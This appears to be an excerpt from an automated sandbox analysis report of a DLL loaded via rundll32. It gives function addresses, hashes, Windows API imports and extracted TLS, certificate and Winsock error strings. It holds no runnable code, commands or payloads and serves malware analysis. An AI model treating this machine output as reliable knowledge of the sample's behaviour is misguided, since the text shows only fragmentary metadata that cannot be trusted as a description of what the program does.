Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast$DisablePrintScreen@@
String ID:
API String ID: 1695489132-0
Opcode ID: 5660353f57c367ec0877beb0c7e2e29d89b199232738891369a4ca84d407b132
Instruction ID: 8a69be3a5b12c5c78e9763d4c20ee52d38b3fdf15b3cc4efe35db0f048c6179b
Opcode Fuzzy Hash: 5660353f57c367ec0877beb0c7e2e29d89b199232738891369a4ca84d407b132
Instruction Fuzzy Hash: 85B1E5755047969BE728AB25C891FB7B3F8EF44308F64446DEA83C6580EB74E9858720

Function 6D020360 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15ba7d21a9975fdc1d1998c089918a66fbc18e5364f3e5109c28cf8aee5db37b
Instruction ID: ec837d82dc7580389455b0553c46a6c0ff20139322afd841178bf63f5fab8422
Opcode Fuzzy Hash: 15ba7d21a9975fdc1d1998c089918a66fbc18e5364f3e5109c28cf8aee5db37b
Instruction Fuzzy Hash: F3512431A0C3858BE725CF2DD8603BAB7E5EFC6308F54866ED8C9C7242E77195858752

Function 6D0527B7 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bed93afb3aa8b247f55229e1fb3051f7e80f622f4801aba399a508c5cd4bd5d
Instruction ID: 71c2469d584f3f9793c74173611d2b9a6af7f92b1be14d869dc2c95c5e9c3a61
Opcode Fuzzy Hash: 6bed93afb3aa8b247f55229e1fb3051f7e80f622f4801aba399a508c5cd4bd5d
Instruction Fuzzy Hash: A5517172D0011AEFEB14CFA8C9407EEBBB1FF49304F598458E955AB301D774AA51CB90

Function 6D04AAC0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: d8eb9f177e0bf7cf2241593b0125c29bc53e2310a4dd57b3c726d5bd927478a7
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 1511E677245083C3F300892DD4B4FB7B3D7EAC526DF38C27AD0624B656DA23A1459580

Function 04EB34F0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: f2f5852ecc3e4682840ae1439ddf76e00da19405a2e6e17f41d2c2df04c39ef9
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 63117177A0308143D7188A3DD4B65F7D795EBC532872CE37AD8C24B758D622F1459580

Function 04ED2998 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 6217229623a18797916b691b752c5dc1425a5a4b050ca7c597f0a944686e93b1
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: A9115B7720508183D2648A7DE9B42BBA395EBC632872CB3FAC3818B75CD522F143A504

Function 6D0488B0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a3e320f203e8067fcea55abb847e74ddb633779367eb2ed33aaaaf0bb3f510d
Instruction ID: e0e454763ea8004734d8973d87464c9eb2f876cef87ac46d0ee376317e949c09
Opcode Fuzzy Hash: 3a3e320f203e8067fcea55abb847e74ddb633779367eb2ed33aaaaf0bb3f510d
Instruction Fuzzy Hash: C0F0A016102D2143EF02983D70C0AF35B87CFEA958BB124B99588435D2C64F680FE3E4

Function 04EFE3AD Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EFE000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4efe000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
Instruction ID: 2dc3e5b6a6d928cba46f50c9c87f582115b598da7a33712f04056574820e8ac2
Opcode Fuzzy Hash: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
Instruction Fuzzy Hash: 36F08232316290CFE721CE1DCCC8F79B3E8EB50678F1924A9E64897171D320F848D650

Function 6D01A1F0 Relevance: 154.3, APIs: 4, Strings: 84, Instructions: 260COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,?,00000000), ref: 6D01A21D

Strings

SEC_E_CRYPTO_SYSTEM_INVALID, xrefs: 6D01A306
SEC_I_SIGNATURE_NEEDED, xrefs: 6D01A5D5
SEC_E_BUFFER_TOO_SMALL, xrefs: 6D01A2C5
SEC_E_SHUTDOWN_IN_PROGRESS, xrefs: 6D01A4B4
SEC_I_COMPLETE_AND_CONTINUE, xrefs: 6D01A58F
SEC_E_INVALID_PARAMETER, xrefs: 6D01A374
SEC_E_CROSSREALM_DELEGATION_FAILURE, xrefs: 6D01A2FC
SEC_E_MUST_BE_KDC, xrefs: 6D01A3F6
SEC_E_OUT_OF_SEQUENCE, xrefs: 6D01A45A
SEC_E_INSUFFICIENT_MEMORY, xrefs: 6D01A356
SEC_E_KDC_INVALID_REQUEST, xrefs: 6D01A3B0
SEC_E_UNFINISHED_CONTEXT_DELETED, xrefs: 6D01A504
SEC_E_BAD_PKGID, xrefs: 6D01A2BE
SEC_E_NO_KERB_KEY, xrefs: 6D01A432
%s - %s, xrefs: 6D01A2A3
SEC_E_KDC_CERT_EXPIRED, xrefs: 6D01A39C
SEC_E_MAX_REFERRALS_EXCEEDED, xrefs: 6D01A3D8
CRYPT_E_REVOKED, xrefs: 6D01A54A
SEC_E_SECPKG_NOT_FOUND, xrefs: 6D01A4A0
SEC_E_SMARTCARD_CERT_EXPIRED, xrefs: 6D01A4BE
SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log., xrefs: 6D01A5F5
SEC_E_NO_CREDENTIALS, xrefs: 6D01A414
SEC_E_ENCRYPT_FAILURE, xrefs: 6D01A338
SEC_E_UNSUPPORTED_PREAUTH, xrefs: 6D01A522
%s (0x%08X), xrefs: 6D01A26D
SEC_E_TOO_MANY_PRINCIPALS, xrefs: 6D01A4FA
SEC_E_QOP_NOT_SUPPORTED, xrefs: 6D01A482
SEC_E_REVOCATION_OFFLINE_C, xrefs: 6D01A48C
SEC_E_SMARTCARD_CERT_REVOKED, xrefs: 6D01A4C8
SEC_E_CERT_UNKNOWN, xrefs: 6D01A2E1
SEC_I_NO_LSA_CONTEXT, xrefs: 6D01A5C1
SEC_E_ISSUING_CA_UNTRUSTED_KDC, xrefs: 6D01A392
SEC_I_COMPLETE_NEEDED, xrefs: 6D01A26C, 6D01A599
SEC_E_LOGON_DENIED, xrefs: 6D01A3CE
SEC_E_NO_TGT_REPLY, xrefs: 6D01A450
SEC_E_DELEGATION_REQUIRED, xrefs: 6D01A324
SEC_E_CANNOT_INSTALL, xrefs: 6D01A2CC
SEC_E_UNKNOWN_CREDENTIALS, xrefs: 6D01A50E
SEC_E_PKINIT_CLIENT_FAILURE, xrefs: 6D01A464
SEC_E_ISSUING_CA_UNTRUSTED, xrefs: 6D01A388
SEC_E_POLICY_NLTM_ONLY, xrefs: 6D01A478
SEC_E_DELEGATION_POLICY, xrefs: 6D01A31A
SEC_E_NOT_OWNER, xrefs: 6D01A400
SEC_E_TIME_SKEW, xrefs: 6D01A4F0
SEC_E_UNTRUSTED_ROOT, xrefs: 6D01A52C
SEC_E_PKINIT_NAME_MISMATCH, xrefs: 6D01A46E
SEC_I_LOCAL_LOGON, xrefs: 6D01A5B7
SEC_E_REVOCATION_OFFLINE_KDC, xrefs: 6D01A496
SEC_E_INTERNAL_ERROR, xrefs: 6D01A360
SEC_E_UNSUPPORTED_FUNCTION, xrefs: 6D01A518
SEC_E_SECURITY_QOS_FAILED, xrefs: 6D01A4AA
SEC_E_INCOMPLETE_CREDENTIALS, xrefs: 6D01A342
SEC_E_INCOMPLETE_MESSAGE, xrefs: 6D01A34C
SEC_E_CERT_WRONG_USAGE, xrefs: 6D01A2E8
Unknown error, xrefs: 6D01A5DF
No error, xrefs: 6D01A562
SEC_I_INCOMPLETE_CREDENTIALS, xrefs: 6D01A5AD
SEC_E_DOWNGRADE_DETECTED, xrefs: 6D01A32E
SEC_E_WRONG_PRINCIPAL, xrefs: 6D01A540
SEC_E_INVALID_HANDLE, xrefs: 6D01A36A
SEC_E_NO_AUTHENTICATING_AUTHORITY, xrefs: 6D01A40A
SEC_E_MESSAGE_ALTERED, xrefs: 6D01A3E2
SEC_E_NO_IMPERSONATION, xrefs: 6D01A41E
SEC_E_CANNOT_PACK, xrefs: 6D01A2D3
SEC_E_CERT_EXPIRED, xrefs: 6D01A2DA
SEC_E_ALGORITHM_MISMATCH, xrefs: 6D01A266
SEC_E_CONTEXT_EXPIRED, xrefs: 6D01A2F2
SEC_E_KDC_UNABLE_TO_REFER, xrefs: 6D01A3BA
SEC_I_CONTEXT_EXPIRED, xrefs: 6D01A5A3
SEC_E_NO_PA_DATA, xrefs: 6D01A43C
SEC_E_SMARTCARD_LOGON_REQUIRED, xrefs: 6D01A4D2
SEC_I_RENEGOTIATE, xrefs: 6D01A5CB
SEC_E_MULTIPLE_ACCOUNTS, xrefs: 6D01A3EC
SEC_E_WRONG_CREDENTIAL_HANDLE, xrefs: 6D01A536
SEC_E_KDC_UNKNOWN_ETYPE, xrefs: 6D01A3C4
SEC_E_INVALID_TOKEN, xrefs: 6D01A37E
SEC_E_TARGET_UNKNOWN, xrefs: 6D01A4E6
SEC_I_CONTINUE_NEEDED, xrefs: 6D01A56C
SEC_E_BAD_BINDINGS, xrefs: 6D01A2B7
SEC_E_KDC_CERT_REVOKED, xrefs: 6D01A3A6
SEC_E_STRONG_CRYPTO_NOT_SUPPORTED, xrefs: 6D01A4DC
SEC_E_DECRYPT_FAILURE, xrefs: 6D01A310
SEC_E_NO_IP_ADDRESSES, xrefs: 6D01A428
SEC_E_NO_S4U_PROT_SUPPORT, xrefs: 6D01A446

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X)$%s - %s$CRYPT_E_REVOKED$No error$SEC_E_ALGORITHM_MISMATCH$SEC_E_BAD_BINDINGS$SEC_E_BAD_PKGID$SEC_E_BUFFER_TOO_SMALL$SEC_E_CANNOT_INSTALL$SEC_E_CANNOT_PACK$SEC_E_CERT_EXPIRED$SEC_E_CERT_UNKNOWN$SEC_E_CERT_WRONG_USAGE$SEC_E_CONTEXT_EXPIRED$SEC_E_CROSSREALM_DELEGATION_FAILURE$SEC_E_CRYPTO_SYSTEM_INVALID$SEC_E_DECRYPT_FAILURE$SEC_E_DELEGATION_POLICY$SEC_E_DELEGATION_REQUIRED$SEC_E_DOWNGRADE_DETECTED$SEC_E_ENCRYPT_FAILURE$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_E_INCOMPLETE_CREDENTIALS$SEC_E_INCOMPLETE_MESSAGE$SEC_E_INSUFFICIENT_MEMORY$SEC_E_INTERNAL_ERROR$SEC_E_INVALID_HANDLE$SEC_E_INVALID_PARAMETER$SEC_E_INVALID_TOKEN$SEC_E_ISSUING_CA_UNTRUSTED$SEC_E_ISSUING_CA_UNTRUSTED_KDC$SEC_E_KDC_CERT_EXPIRED$SEC_E_KDC_CERT_REVOKED$SEC_E_KDC_INVALID_REQUEST$SEC_E_KDC_UNABLE_TO_REFER$SEC_E_KDC_UNKNOWN_ETYPE$SEC_E_LOGON_DENIED$SEC_E_MAX_REFERRALS_EXCEEDED$SEC_E_MESSAGE_ALTERED$SEC_E_MULTIPLE_ACCOUNTS$SEC_E_MUST_BE_KDC$SEC_E_NOT_OWNER$SEC_E_NO_AUTHENTICATING_AUTHORITY$SEC_E_NO_CREDENTIALS$SEC_E_NO_IMPERSONATION$SEC_E_NO_IP_ADDRESSES$SEC_E_NO_KERB_KEY$SEC_E_NO_PA_DATA$SEC_E_NO_S4U_PROT_SUPPORT$SEC_E_NO_TGT_REPLY$SEC_E_OUT_OF_SEQUENCE$SEC_E_PKINIT_CLIENT_FAILURE$SEC_E_PKINIT_NAME_MISMATCH$SEC_E_POLICY_NLTM_ONLY$SEC_E_QOP_NOT_SUPPORTED$SEC_E_REVOCATION_OFFLINE_C$SEC_E_REVOCATION_OFFLINE_KDC$SEC_E_SECPKG_NOT_FOUND$SEC_E_SECURITY_QOS_FAILED$SEC_E_SHUTDOWN_IN_PROGRESS$SEC_E_SMARTCARD_CERT_EXPIRED$SEC_E_SMARTCARD_CERT_REVOKED$SEC_E_SMARTCARD_LOGON_REQUIRED$SEC_E_STRONG_CRYPTO_NOT_SUPPORTED$SEC_E_TARGET_UNKNOWN$SEC_E_TIME_SKEW$SEC_E_TOO_MANY_PRINCIPALS$SEC_E_UNFINISHED_CONTEXT_DELETED$SEC_E_UNKNOWN_CREDENTIALS$SEC_E_UNSUPPORTED_FUNCTION$SEC_E_UNSUPPORTED_PREAUTH$SEC_E_UNTRUSTED_ROOT$SEC_E_WRONG_CREDENTIAL_HANDLE$SEC_E_WRONG_PRINCIPAL$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
API String ID: 1452528299-3170461277
Opcode ID: f9f1f85e886ca6fdf73e17775a5dc093ed6db19121733b57841e1d04b2eba67d
Instruction ID: e1d05e102287a36bdd6180de06cf20f83c0e6c73025102ea00c27a44c7493d2d
Opcode Fuzzy Hash: f9f1f85e886ca6fdf73e17775a5dc093ed6db19121733b57841e1d04b2eba67d
Instruction Fuzzy Hash: B481B2756EFE408BB2A256DC4D84FAE65547703B00FE08126FD0B8F24AD613994F479B

Function 6D01AFA0 Relevance: 89.4, APIs: 1, Strings: 50, Instructions: 135COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 6D01B1B9

Strings

Host not found, xrefs: 6D01B18B
Connection refused, xrefs: 6D01B11C
Host unreachable, xrefs: 6D01B13E
Protocol option is unsupported, xrefs: 6D01B05E
Connection was aborted, xrefs: 6D01B0CC
Disconnected, xrefs: 6D01B16F
Host not found, try again, xrefs: 6D01B1B1
Winsock version not supported, xrefs: 6D01B184
Bad file, xrefs: 6D01AFF0
Too many users, xrefs: 6D01B153
Invalid arguments, xrefs: 6D01B00E
Bad quota, xrefs: 6D01B15A
Name too long, xrefs: 6D01B130
Winsock library not initialised, xrefs: 6D01B17D
Bad argument, xrefs: 6D01B004
Call would block, xrefs: 6D01B022
Connection was reset, xrefs: 6D01B0D6
Unrecoverable error in call to nameserver, xrefs: 6D01B1AA, 6D01B1B7
Protocol is unsupported, xrefs: 6D01B068
Address already in use, xrefs: 6D01B09A
Blocking call in progress, xrefs: 6D01B02C
Network has been reset, xrefs: 6D01B0C2
Call interrupted, xrefs: 6D01AFE6
Socket is already connected, xrefs: 6D01B0EA
Socket is unsupported, xrefs: 6D01B072
Loop??, xrefs: 6D01B126
Out of file descriptors, xrefs: 6D01B018
Timed out, xrefs: 6D01B112
Process limit reached, xrefs: 6D01B14C
Something is stale, xrefs: 6D01B161
No buffer space, xrefs: 6D01B0E0
Socket has been shut down, xrefs: 6D01B0FE
Not empty, xrefs: 6D01B145
Address not available, xrefs: 6D01B0A4
Operation not supported, xrefs: 6D01B07C
Bad protocol, xrefs: 6D01B054
Host down, xrefs: 6D01B137
Remote error, xrefs: 6D01B168
No data record of requested type, xrefs: 6D01B1A3
Descriptor is not a socket, xrefs: 6D01B036
Too many references, xrefs: 6D01B108
Socket is not connected, xrefs: 6D01B0F4
Bad access, xrefs: 6D01AFFA
Address family not supported, xrefs: 6D01B086
Network down, xrefs: 6D01B0AE
Winsock library is not ready, xrefs: 6D01B176
Bad message size, xrefs: 6D01B04A
Network unreachable, xrefs: 6D01B0B8
Protocol family not supported, xrefs: 6D01B090
Need destination address, xrefs: 6D01B040

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: _strncpy
String ID: Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
API String ID: 2961919466-3442644082
Opcode ID: d70c5d98a9efc070c4964a440a3f3832deead1cdbd8396b3101600e007687955
Instruction ID: 1df9e0434703411cbf5089114e68f6e9f5a79428fcc43c6ec3265065989add8d
Opcode Fuzzy Hash: d70c5d98a9efc070c4964a440a3f3832deead1cdbd8396b3101600e007687955
Instruction Fuzzy Hash: DE413619AAD2459BB12288DC9FC93BE95B07763220BC6CD76B605CF348EB51DC41439B

Function 6D03EFD0 Relevance: 51.2, APIs: 10, Strings: 19, Instructions: 411encryptionCOMMON

Download Yara Rule

APIs

CertOpenStore.CRYPT32(00000002,00000000,00000000,00002000,00000000), ref: 6D03F0AC
GetLastError.KERNEL32(?,00000100), ref: 6D03F0C6

Part of subcall function 6D01A940: GetLastError.KERNEL32 ref: 6D01A943

CertCreateCertificateChainEngine.CRYPT32(?,?), ref: 6D03F145
GetLastError.KERNEL32(?,00000100), ref: 6D03F159
CertGetCertificateChain.CRYPT32(?,?,?,?,?,20000000), ref: 6D03F1BA
GetLastError.KERNEL32(?,00000100), ref: 6D03F1CE
CertFreeCertificateChainEngine.CRYPT32(?), ref: 6D03F4CA
CertCloseStore.CRYPT32(?,00000000), ref: 6D03F4DB
CertFreeCertificateChain.CRYPT32(?), ref: 6D03F4EA
CertFreeCertificateContext.CRYPT32(?), ref: 6D03F4F9

Strings

schannel: server certificate name verification failed, xrefs: 6D03F45E
schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED, xrefs: 6D03F21E
schannel: failed to create certificate chain user: %s, xrefs: 6D03F166
0, xrefs: 6D03F137
schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names, xrefs: 6D03F480
(memory blob), xrefs: 6D03F0F0
schannel: CertGetNameString() returned no certificate name information, xrefs: 6D03F313
schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT, xrefs: 6D03F25B
schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN, xrefs: 6D03F23E
schannel: CertGetNameString() returned certificate name information of unexpected size, xrefs: 6D03F373
schannel: CertGetCertificateChain error mask: 0x%08x, xrefs: 6D03F2AE
schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN, xrefs: 6D03F295
schannel: connection hostname (%s) validated against certificate name (%s), xrefs: 6D03F402
schannel: CertGetCertificateChain failed: %s, xrefs: 6D03F1DB
schannel: Failed to read remote certificate context: %s, xrefs: 6D03F4AE
schannel: connection hostname (%s) did not match against certificate name (%s), xrefs: 6D03F414
schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 6D03F087
schannel: failed to create certificate store: %s, xrefs: 6D03F0D3
schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID, xrefs: 6D03F278

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Cert$Certificate$ChainErrorLast$Free$userStore$CloseContextCreateOpen
String ID: (memory blob)$0$schannel: CertGetCertificateChain error mask: 0x%08x$schannel: CertGetCertificateChain failed: %s$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT$schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN$schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names$schannel: CertGetNameString() returned certificate name information of unexpected size$schannel: CertGetNameString() returned no certificate name information$schannel: Failed to read remote certificate context: %s$schannel: connection hostname (%s) did not match against certificate name (%s)$schannel: connection hostname (%s) validated against certificate name (%s)$schannel: failed to create certificate chain user: %s$schannel: failed to create certificate store: %s$schannel: server certificate name verification failed$schannel: this version of Windows is too old to support certificate verification via CA bundle file.
API String ID: 3686861598-146265318
Opcode ID: 39ccf65536f4a85faeccfb54afd98ce4cf0b95764d4f55344bf36ea1d7c8dae0
Instruction ID: 81fbaf11b15a7a38d35071b6d5221b6052eec0833dc6bd02f5fb1305751f3f6b
Opcode Fuzzy Hash: 39ccf65536f4a85faeccfb54afd98ce4cf0b95764d4f55344bf36ea1d7c8dae0
Instruction Fuzzy Hash: D6D1E7B1908312ABF711DF24DC40F6F7BECAF86308F124929F949A7252D775E9048B56

Function 04EB49EF Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,04EB3D15,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB49F7
__mtterm.LIBCMT ref: 04EB4A03

Part of subcall function 04EB46CE: DecodePointer.KERNEL32(00000008,04EB3DD8,04EB3DBE,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB46DF
Part of subcall function 04EB46CE: TlsFree.KERNEL32(0000001C,04EB3DD8,04EB3DBE,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB46F9
Part of subcall function 04EB46CE: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,04EB3DD8,04EB3DBE,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EBAFA5
Part of subcall function 04EB46CE: _free.LIBCMT ref: 04EBAFA8
Part of subcall function 04EB46CE: DeleteCriticalSection.KERNEL32(0000001C,?,?,04EB3DD8,04EB3DBE,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EBAFCF

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 04EB4A19
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 04EB4A26
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 04EB4A33
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 04EB4A40
TlsAlloc.KERNEL32(?,?,04EB3D15,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB4A90
